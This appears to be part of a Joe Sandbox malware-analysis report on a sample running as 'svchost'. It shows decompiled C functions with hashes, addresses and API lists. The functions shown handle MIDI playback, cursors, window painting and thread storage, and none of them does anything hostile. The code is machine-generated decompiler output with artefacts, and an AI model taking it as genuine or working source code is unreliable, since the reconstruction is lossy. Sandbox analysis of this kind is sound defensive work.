    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Menu$DestroyHelpWindow
    • String ID:
    • API String ID: 427501538-0
    • Opcode ID: 1473411f23f01daa8169ef2d679f95db0780e2fd014171c28812189152ac4253
    • Instruction ID: 0577d15065a1ae1e11a822a269331571f66a33f88e753ef4b39ff7707a26b424
    • Opcode Fuzzy Hash: 1473411f23f01daa8169ef2d679f95db0780e2fd014171c28812189152ac4253
    • Instruction Fuzzy Hash: 6331C371600205ABC314AF66CC85AABB7ACEF45348F05461FF90993240EB79BC8487E9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428550(intOrPtr* __ecx) {
    				intOrPtr _v4;
    				void* __ebx;
    				intOrPtr _t23;
    				int _t25;
    				int _t27;
    				int _t33;
    				int _t38;
    				struct HMIDISTRM__* _t58;
    				intOrPtr* _t59;
    
    				_t59 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x18)) != 0 ||  *((intOrPtr*)(__ecx + 0x50)) != 0xc8) {
    					_t23 =  *((intOrPtr*)(_t59 + 0x50));
    					 *((intOrPtr*)(_t59 + 0x4c)) = 0;
    					 *((intOrPtr*)(_t59 + 0x18)) = 0;
    					if(_t23 != 0xc8 && _t23 != 0x12c) {
    						 *((intOrPtr*)(_t59 + 0x50)) = 0x64;
    					}
    					_t25 = midiStreamStop( *(_t59 + 0x1c));
    					if(_t25 == 0) {
    						_t27 = midiOutReset( *(_t59 + 0x1c));
    						if(_t27 == 0) {
    							if(WaitForSingleObject( *(_t59 + 0x54), 0x7d0) == 0x102) {
    								 *((intOrPtr*)(_t59 + 0x50)) = 0xc8;
    							}
    							if( *((intOrPtr*)(_t59 + 0x50)) != 0xc8) {
    								goto L23;
    							} else {
    								goto L12;
    							}
    						} else {
    							 *((intOrPtr*)( *_t59 + 4))(_t27);
    							return 0;
    						}
    					} else {
    						 *((intOrPtr*)( *_t59 + 4))(_t25);
    						return 0;
    					}
    				} else {
    					L12:
    					 *((intOrPtr*)(_t59 + 0x50)) = 0;
    					E004291A0(0, _t59);
    					_t58 =  *(_t59 + 0x1c);
    					 *(_t59 + 0x1c) = 0;
    					if(_v4 == 0) {
    						L20:
    						if(_t58 != 0) {
    							_t33 = midiStreamClose(_t58);
    							if(_t33 != 0) {
    								 *((intOrPtr*)( *_t59 + 4))(_t33);
    							}
    						}
    						L23:
    						return 1;
    					} else {
    						if(E00428EB0(_t59) != 0) {
    							if( *((intOrPtr*)(_t59 + 0x24)) == 0) {
    								E004286A0(_t59);
    								 *((intOrPtr*)(_t59 + 0x20)) = 0;
    								 *((intOrPtr*)(_t59 + 0x94)) = 0;
    							}
    							goto L20;
    						} else {
    							if(_t58 != 0) {
    								_t38 = midiStreamClose(_t58);
    								if(_t38 != 0) {
    									 *((intOrPtr*)( *_t59 + 4))(_t38);
    								}
    							}
    							return 0;
    						}
    					}
    				}
    			}

    0x00428552
    0x0042855f
    0x00428566
    0x00428569
    0x0042856e
    0x00428571
    0x0042857a
    0x0042857a
    0x00428585
    0x0042858d
    0x004285a3
    0x004285ab
    0x004285d1
    0x004285d3
    0x004285d3
    0x004285d9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004285ad
    0x004285b2
    0x004285ba
    0x004285ba
    0x0042858f
    0x00428594
    0x0042859c
    0x0042859c
    0x004285db
    0x004285db
    0x004285dd
    0x004285e0
    0x004285e9
    0x004285ee
    0x004285f1
    0x00428632
    0x00428634
    0x00428637
    0x0042863f
    0x00428646
    0x00428646
    0x0042863f
    0x0042864b
    0x00428651
    0x004285f3
    0x004285fc
    0x00428620
    0x00428624
    0x00428629
    0x0042862c
    0x0042862c
    0x00000000
    0x004285fe
    0x00428600
    0x00428603
    0x0042860b
    0x00428612
    0x00428612
    0x0042860b
    0x0042861a
    0x0042861a
    0x004285fc
    0x004285f1

    APIs
    • midiStreamStop.WINMM(?,00000000,?,00000000,004280BA,00000000,^I,0041AB16,^I,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 00428585
    • midiOutReset.WINMM(?,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 004285A3
    • WaitForSingleObject.KERNEL32(?,000007D0,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 004285C6
    • midiStreamClose.WINMM(?,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 00428603
    • midiStreamClose.WINMM(?,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 00428637
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: midi$Stream$Close$ObjectResetSingleStopWait
    • String ID:
    • API String ID: 3142198506-0
    • Opcode ID: 72a9eb2536bf08810aedc27b9a7359a6a8fe9a4eb956fb087a1284a0480b7979
    • Instruction ID: be9cff906f6c39f953605146a2aa9babaccdd9a656a4764836de9b09acad3106
    • Opcode Fuzzy Hash: 72a9eb2536bf08810aedc27b9a7359a6a8fe9a4eb956fb087a1284a0480b7979
    • Instruction Fuzzy Hash: 01313EB27017619BCB309F65E48851FB7E5BB943057544A3FE142C6641CB78EC868B98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041E920(void* __ecx, struct HWND__* _a4) {
    				struct tagRECT _v16;
    				struct tagPOINT _v24;
    				struct tagPOINT _v28;
    				struct HWND__* _t19;
    				void* _t22;
    				int _t35;
    				struct HWND__* _t48;
    				void* _t49;
    				void* _t51;
    				void* _t52;
    				struct HICON__* _t54;
    
    				_t48 = _a4;
    				_t49 = __ecx;
    				if(_t48 == 0) {
    					L11:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t19 =  *(__ecx + 0x1c);
    					if(_t48 == _t19 || IsChild(_t19, _t48) != 0) {
    						if(_t48 !=  *(_t49 + 0x1c)) {
    							L5:
    							if(E00413AB0(E00418A40(0x3e9, 0, 0), _t61,  *((intOrPtr*)(_t49 + 0xdc)),  &(_v16.right), 0) == 0) {
    								goto L11;
    							} else {
    								if(_t48 !=  *(_t49 + 0x1c)) {
    									_t22 = E00414340(_a4, _t48, 1);
    									__eflags = _t22 - 0xffffffff;
    									if(_t22 == 0xffffffff) {
    										goto L11;
    									} else {
    										goto L9;
    									}
    								} else {
    									_t22 = 0;
    									L9:
    									_t16 = _a4 + 0x14; // 0x14
    									_t51 = E004135B0(_t16, _t22, 0) + 0x18;
    									_t52 = _t51 + E0040C020(_t16, _t51);
    									_t54 =  *(_t52 + E0040C020(_t16, _t52) + 0x14);
    									if(_t54 == 0) {
    										goto L11;
    									} else {
    										SetCursor(_t54);
    										return 1;
    									}
    								}
    							}
    						} else {
    							GetCursorPos( &_v24);
    							GetClientRect( *(_t49 + 0x1c),  &_v16);
    							E00489AC0(_t49,  &_v16);
    							_push(_v24.x);
    							_t35 = PtInRect( &(_v24.y), _v28);
    							_t61 = _t35;
    							if(_t35 == 0) {
    								goto L11;
    							} else {
    								goto L5;
    							}
    						}
    					} else {
    						goto L11;
    					}
    				}
    			}

    0x0041e925
    0x0041e929
    0x0041e92d
    0x0041ea16
    0x0041ea16
    0x0041ea1c
    0x0041e933
    0x0041e933
    0x0041e938
    0x0041e94d
    0x0041e992
    0x0041e9b7
    0x00000000
    0x0041e9b9
    0x0041e9bc
    0x0041e9c9
    0x0041e9ce
    0x0041e9d1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041e9be
    0x0041e9be
    0x0041e9d3
    0x0041e9da
    0x0041e9e4
    0x0041e9ed
    0x0041e9fa
    0x0041e9ff
    0x00000000
    0x0041ea01
    0x0041ea02
    0x0041ea12
    0x0041ea12
    0x0041e9ff
    0x0041e9bc
    0x0041e94f
    0x0041e954
    0x0041e963
    0x0041e970
    0x0041e97d
    0x0041e984
    0x0041e98a
    0x0041e98c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041e98c
    0x00000000
    0x00000000
    0x00000000
    0x0041e938

    APIs
    • IsChild.USER32(?,?), ref: 0041E93C
      • Part of subcall function 00414340: IsChild.USER32(?,?), ref: 004143BD
      • Part of subcall function 00414340: GetParent.USER32(?), ref: 004143D7
    • GetCursorPos.USER32(?), ref: 0041E954
    • GetClientRect.USER32(?,?), ref: 0041E963
    • PtInRect.USER32(?,?,?), ref: 0041E984
    • SetCursor.USER32(?,?,00000000,?,?,?,?,0041E5B0), ref: 0041EA02
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ChildCursorRect$ClientParent
    • String ID:
    • API String ID: 1110532797-0
    • Opcode ID: b0e6905633e18e50bcb4648608da776763fa336234f04bdfda1038f0afd0105f
    • Instruction ID: 584ce7fbb5ed5a0ec7dbdbd8b360fda0c2de13dd30a0654e591be6c6ea2a37c2
    • Opcode Fuzzy Hash: b0e6905633e18e50bcb4648608da776763fa336234f04bdfda1038f0afd0105f
    • Instruction Fuzzy Hash: C221E675600211ABC720EB26DC45FDF73E8AF94758F084A2FF845A3281E778E945C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0040C7C0(void* __ecx, void* __edi, void* __ebp) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				struct HDC__* _v32;
    				char _v40;
    				struct tagRECT _v56;
    				char _v60;
    				struct tagRECT _v76;
    				struct HBRUSH__* _t43;
    				intOrPtr _t76;
    
    				_push(0xffffffff);
    				_push(E0048DD98);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t76;
    				_t72 = __ecx;
    				_t80 =  *((intOrPtr*)(__ecx + 0x6c));
    				if( *((intOrPtr*)(__ecx + 0x6c)) != 0) {
    					E00484BEB(__ecx);
    					__eflags = 0;
    					 *[fs:0x0] = _v12;
    					return 0;
    				} else {
    					_push(__ecx);
    					E00489CCA( &_v32, _t80);
    					_v8 = 0;
    					GetClientRect( *(__ecx + 0x1c),  &(_v56.top));
    					GetWindowRect( *(_t72 + 0x1c),  &(_v76.right));
    					E00489A84(_t72,  &(_v76.right));
    					OffsetRect( &_v56,  ~(_v76.top),  ~(_v76.right.left));
    					E004899C1( &_v40,  &_v56);
    					OffsetRect( &_v76,  ~(_v76.left),  ~(_v76.top));
    					_t43 = _t72 + 0xa8;
    					_t81 = _t43;
    					if(_t43 != 0) {
    						_t43 =  *(_t43 + 4);
    					}
    					FillRect(_v32,  &(_v76.right), _t43);
    					E0048551D(_t72, 0x85, 1, 0);
    					_v32 = 0xffffffff;
    					E00489D3C( &_v60, _t81);
    					 *[fs:0x0] = _v40;
    					return 0;
    				}
    			}

    0x0040c7c6
    0x0040c7c8
    0x0040c7cd
    0x0040c7ce
    0x0040c7d9
    0x0040c7de
    0x0040c7e0
    0x0040c8b7
    0x0040c8c0
    0x0040c8c3
    0x0040c8cd
    0x0040c7e6
    0x0040c7e7
    0x0040c7ec
    0x0040c7fa
    0x0040c802
    0x0040c811
    0x0040c81e
    0x0040c83c
    0x0040c847
    0x0040c85f
    0x0040c861
    0x0040c868
    0x0040c86a
    0x0040c86c
    0x0040c86c
    0x0040c87a
    0x0040c88b
    0x0040c894
    0x0040c89c
    0x0040c8a8
    0x0040c8b2
    0x0040c8b2

    APIs
      • Part of subcall function 00489CCA: __EH_prolog.LIBCMT ref: 00489CCF
      • Part of subcall function 00489CCA: GetWindowDC.USER32(?,?,?,0040C7F1), ref: 00489CF8
    • GetClientRect.USER32 ref: 0040C802
    • GetWindowRect.USER32(?,?), ref: 0040C811
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000000), ref: 00489A98
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000008), ref: 00489AA1
    • OffsetRect.USER32(?,?,?), ref: 0040C83C
      • Part of subcall function 004899C1: ExcludeClipRect.GDI32(?,?,?,?,?,775D4410,?,?,0040C84C,?), ref: 004899E6
      • Part of subcall function 004899C1: ExcludeClipRect.GDI32(?,?,?,?,?,775D4410,?,?,0040C84C,?), ref: 004899FB
    • OffsetRect.USER32(?,?,?), ref: 0040C85F
    • FillRect.USER32(?,?,?), ref: 0040C87A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Client$ClipExcludeOffsetScreenWindow$FillH_prolog
    • String ID:
    • API String ID: 2829754061-0
    • Opcode ID: f62f079a9813574644149a42f7d236a8fa0f07d6940db670fb5dcb35bcf5f822
    • Instruction ID: 20d7f857f383c394fcf8cdc1da832a05d3a4ed9262b6376e31d327af2255b482
    • Opcode Fuzzy Hash: f62f079a9813574644149a42f7d236a8fa0f07d6940db670fb5dcb35bcf5f822
    • Instruction Fuzzy Hash: 12314FB5208702AFD714EB64C845EABB7E8EBD4714F008E1EF49687290DB78E905CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00474C35() {
    				void _t10;
    				long _t15;
    				void* _t16;
    
    				_t15 = GetLastError();
    				_t16 = TlsGetValue( *0x4b995c);
    				if(_t16 == 0) {
    					_t16 = E004724F2(1, 0x74);
    					if(_t16 == 0 || TlsSetValue( *0x4b995c, _t16) == 0) {
    						E0046FE64(0x10);
    					} else {
    						E00474C22(_t16);
    						_t10 = GetCurrentThreadId();
    						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
    						 *_t16 = _t10;
    					}
    				}
    				SetLastError(_t15);
    				return _t16;
    			}

    0x00474c43
    0x00474c4b
    0x00474c4f
    0x00474c5a
    0x00474c60
    0x00474c8a
    0x00474c73
    0x00474c74
    0x00474c7a
    0x00474c80
    0x00474c84
    0x00474c84
    0x00474c60
    0x00474c91
    0x00474c9b

    APIs
    • GetLastError.KERNEL32(00000001,?,00472142,0047AF55,00000000,0047BED2,?,?,00000001,00000800,?,?,?,0047A1BB,?,00000000), ref: 00474C37
    • TlsGetValue.KERNEL32(?,0047A1BB,?,00000000,?,00479BEB,00000000,00000000,00000000), ref: 00474C45
    • SetLastError.KERNEL32(00000000,?,0047A1BB,?,00000000,?,00479BEB,00000000,00000000,00000000), ref: 00474C91
      • Part of subcall function 004724F2: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 004725E8
    • TlsSetValue.KERNEL32(00000000,?,0047A1BB,?,00000000,?,00479BEB,00000000,00000000,00000000), ref: 00474C69
    • GetCurrentThreadId.KERNEL32 ref: 00474C7A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorLastValue$AllocateCurrentHeapThread
    • String ID:
    • API String ID: 2047054392-0
    • Opcode ID: 93443bb33d3c57b0c1705f2b229b1c5a4e34b309320ee102034d662c6829ac26
    • Instruction ID: 4952c5b9feba21f4ff80468edf74b1910457279f621e2955d8236ee4b481fe21
    • Opcode Fuzzy Hash: 93443bb33d3c57b0c1705f2b229b1c5a4e34b309320ee102034d662c6829ac26
    • Instruction Fuzzy Hash: 13F09C315023127FD7351B65BF096663A54AB51771711823BF649952A0DB748C01875C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0048C889(long* __ecx) {
    				long _t4;
    				intOrPtr _t5;
    				void* _t6;
    				void* _t15;
    				intOrPtr _t16;
    				long* _t17;
    
    				_t17 = __ecx;
    				_t4 =  *__ecx;
    				if(_t4 != 0xffffffff) {
    					TlsFree(_t4);
    				}
    				_t1 = _t17 + 0x14; // 0xe144e8
    				_t5 =  *_t1;
    				if(_t5 != 0) {
    					do {
    						_t16 =  *((intOrPtr*)(_t5 + 4));
    						E0048CB55(_t17, _t5, 0);
    						_t5 = _t16;
    					} while (_t16 != 0);
    				}
    				_t3 = _t17 + 0x10; // 0xe05b70
    				_t6 =  *_t3;
    				if(_t6 != 0) {
    					_t15 = GlobalHandle(_t6);
    					GlobalUnWire(_t15);
    					GlobalFree(_t15);
    				}
    				return  *0x492294(_t17 + 0x1c);
    			}

    0x0048c88a
    0x0048c88d
    0x0048c892
    0x0048c895
    0x0048c895
    0x0048c89b
    0x0048c89b
    0x0048c8a0
    0x0048c8a2
    0x0048c8a2
    0x0048c8aa
    0x0048c8b1
    0x0048c8b1
    0x0048c8a2
    0x0048c8b5
    0x0048c8b5
    0x0048c8ba
    0x0048c8c3
    0x0048c8c6
    0x0048c8cd
    0x0048c8cd
    0x0048c8df

    APIs
    • TlsFree.KERNEL32(00000000,?,?,0048CD96,00000000,00000001), ref: 0048C895
    • GlobalHandle.KERNEL32(00E05B70), ref: 0048C8BD
    • GlobalUnWire.KERNEL32(00000000), ref: 0048C8C6
    • GlobalFree.KERNEL32(00000000), ref: 0048C8CD
    • RtlDeleteCriticalSection.NTDLL(004E1400), ref: 0048C8D7
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Global$Free$CriticalDeleteHandleSectionWire
    • String ID:
    • API String ID: 1964465133-0
    • Opcode ID: 85285146415c435480c3c8a57195ce242a28e958660d374092473d137e5f96cf
    • Instruction ID: 3fe8a8c665fc4e58613a992b13536275436d77c7c7daa4008b91f31838d75c49
    • Opcode Fuzzy Hash: 85285146415c435480c3c8a57195ce242a28e958660d374092473d137e5f96cf
    • Instruction Fuzzy Hash: 21F0B435240610AFD2207B29AE48A2F73ADAF90711705097BF905D3350CBB4DC058778
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00414DA0(unsigned int __ecx, void* __ebp, void* __eflags) {
    				intOrPtr _v4;
    				char _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr* _v20;
    				void* __edi;
    				void* _t118;
    				intOrPtr* _t119;
    				intOrPtr* _t121;
    				intOrPtr* _t123;
    				void* _t160;
    				intOrPtr* _t162;
    				intOrPtr* _t163;
    				void* _t165;
    				unsigned int _t166;
    				intOrPtr _t169;
    
    				 *[fs:0x0] = _t169;
    				_t166 = __ecx;
    				_v20 = __ecx;
    				 *((intOrPtr*)(__ecx)) = 0x495ee0;
    				_v4 = 0x21;
    				E00418600(__ecx, 0);
    				 *0x492294(0x4c9e70, _t160, _t165,  *[fs:0x0], E0048E649, 0xffffffff);
    				_v12 = 0x20;
    				 *((intOrPtr*)(_t166 + 0x410)) = 0x495e50;
    				E0040B7D0(_t166 + 0x410);
    				_v12 = 0x1f;
    				 *((intOrPtr*)(_t166 + 0x3c8)) = 0x495f7c;
    				E00485312(_t166 + 0x3c8);
    				_v12 = 0x1e;
    				 *((intOrPtr*)(_t166 + 0x3b8)) = 0x496034;
    				if( *((intOrPtr*)(_t166 + 0x3bc)) == 0) {
    					_t123 =  *((intOrPtr*)(_t166 + 0x3c4));
    					if(_t123 != 0) {
    						 *_t123();
    					}
    				}
    				_v8 = 0x1d;
    				E00482377(_t166 + 0x3a4);
    				_v8 = 0x1c;
    				E0042A510(_t166 + 0x394);
    				_v8 = 0x1b;
    				 *((intOrPtr*)(_t166 + 0x384)) = 0x496034;
    				if( *((intOrPtr*)(_t166 + 0x388)) == 0) {
    					_t121 =  *((intOrPtr*)(_t166 + 0x390));
    					if(_t121 != 0) {
    						 *_t121();
    					}
    				}
    				_v8 = 0x1a;
    				 *((intOrPtr*)(_t166 + 0x370)) = 0x496034;
    				if( *((intOrPtr*)(_t166 + 0x374)) == 0) {
    					_t119 =  *((intOrPtr*)(_t166 + 0x37c));
    					if(_t119 != 0) {
    						 *_t119();
    					}
    				}
    				_v8 = 0x19;
    				E00433CE0(_t166 + 0x354);
    				_v8 = 0x18;
    				E00427FE0(_t166 + 0x2a4);
    				_v8 = 0x17;
    				 *((intOrPtr*)(_t166 + 0x290)) = 0x495e50;
    				E0040B7D0(_t166 + 0x290);
    				_v8 = 0x16;
    				 *((intOrPtr*)(_t166 + 0x268)) = 0x495e50;
    				E0040B7D0(_t166 + 0x268);
    				_v8 = 0x15;
    				 *((intOrPtr*)(_t166 + 0x254)) = 0x495e50;
    				E0040B7D0(_t166 + 0x254);
    				_v8 = 0x14;
    				 *((intOrPtr*)(_t166 + 0x240)) = 0x495e50;
    				E0040B7D0(_t166 + 0x240);
    				_v8 = 0x13;
    				 *((intOrPtr*)(_t166 + 0x22c)) = 0x495e50;
    				E0040B7D0(_t166 + 0x22c);
    				_v8 = 0x12;
    				 *((intOrPtr*)(_t166 + 0x214)) = 0x495e50;
    				E0040B7D0(_t166 + 0x214);
    				_v8 = 0x11;
    				 *((intOrPtr*)(_t166 + 0x200)) = 0x495e50;
    				E0040B7D0(_t166 + 0x200);
    				_v8 = 0x10;
    				 *((intOrPtr*)(_t166 + 0x1ec)) = 0x495e50;
    				E0040B7D0(_t166 + 0x1ec);
    				_v8 = 0xf;
    				E004832C2(_t166 + 0x1d0);
    				_v8 = 0xe;
    				E004832C2(_t166 + 0x1cc);
    				_v8 = 0xd;
    				E004823D7(_t166 + 0x1b4);
    				_v8 = 0xc;
    				 *((intOrPtr*)(_t166 + 0x1a0)) = 0x495e50;
    				E0040B7D0(_t166 + 0x1a0);
    				_v8 = 0xb;
    				 *((intOrPtr*)(_t166 + 0x184)) = 0x495e50;
    				E0040B7D0(_t166 + 0x184);
    				_v8 = 0xa;
    				 *((intOrPtr*)(_t166 + 0x170)) = 0x495e50;
    				E0040B7D0(_t166 + 0x170);
    				_v8 = 9;
    				 *((intOrPtr*)(_t166 + 0x15c)) = 0x495e50;
    				E0040B7D0(_t166 + 0x15c);
    				_v8 = 8;
    				 *((intOrPtr*)(_t166 + 0x148)) = 0x495e50;
    				E0040B7D0(_t166 + 0x148);
    				_v8 = 7;
    				 *((intOrPtr*)(_t166 + 0x134)) = 0x495e50;
    				E0040B7D0(_t166 + 0x134);
    				_v8 = 6;
    				 *((intOrPtr*)(_t166 + 0x120)) = 0x495e50;
    				E0040B7D0(_t166 + 0x120);
    				_t162 = _t166 + 0x104;
    				_v20 = _t162;
    				 *_t162 = 0x496038;
    				_v8 = 0x22;
    				E00414590();
    				 *_t162 = 0x496044;
    				_t163 = _t162 + 8;
    				_v8 = 0x23;
    				E0040B7D0(_t163);
    				_v8 = 5;
    				 *_t163 = 0x495e50;
    				E0040B7D0(_t163);
    				_v8 = 4;
    				E004823D7(_t166 + 0xf0);
    				_v8 = 3;
    				E004823D7(_t166 + 0xdc);
    				_v8 = 2;
    				E004832C2(_t166 + 0xd8);
    				_v8 = 1;
    				E004832C2(_t166 + 0xd4);
    				_v8 = 0;
    				E004832C2(_t166 + 0xd0);
    				_v8 = 0xffffffff;
    				_t118 = E0048CF0C(_t166, _t163);
    				 *[fs:0x0] = _v16;
    				return _t118;
    			}

    0x00414dae
    0x00414db9
    0x00414dbc
    0x00414dc0
    0x00414dc8
    0x00414dd0
    0x00414dda
    0x00414de6
    0x00414deb
    0x00414df1
    0x00414dfc
    0x00414e01
    0x00414e07
    0x00414e19
    0x00414e1e
    0x00414e24
    0x00414e26
    0x00414e2e
    0x00414e30
    0x00414e30
    0x00414e2e
    0x00414e38
    0x00414e3d
    0x00414e48
    0x00414e4d
    0x00414e58
    0x00414e5f
    0x00414e65
    0x00414e67
    0x00414e6f
    0x00414e71
    0x00414e71
    0x00414e6f
    0x00414e79
    0x00414e80
    0x00414e86
    0x00414e88
    0x00414e90
    0x00414e92
    0x00414e92
    0x00414e90
    0x00414e9a
    0x00414e9f
    0x00414eaa
    0x00414eaf
    0x00414eba
    0x00414ebf
    0x00414ec5
    0x00414ed0
    0x00414ed5
    0x00414edb
    0x00414ee6
    0x00414eeb
    0x00414ef1
    0x00414efc
    0x00414f01
    0x00414f07
    0x00414f12
    0x00414f17
    0x00414f1d
    0x00414f28
    0x00414f2d
    0x00414f33
    0x00414f3e
    0x00414f43
    0x00414f49
    0x00414f54
    0x00414f59
    0x00414f5f
    0x00414f6a
    0x00414f6f
    0x00414f7a
    0x00414f7f
    0x00414f8a
    0x00414f8f
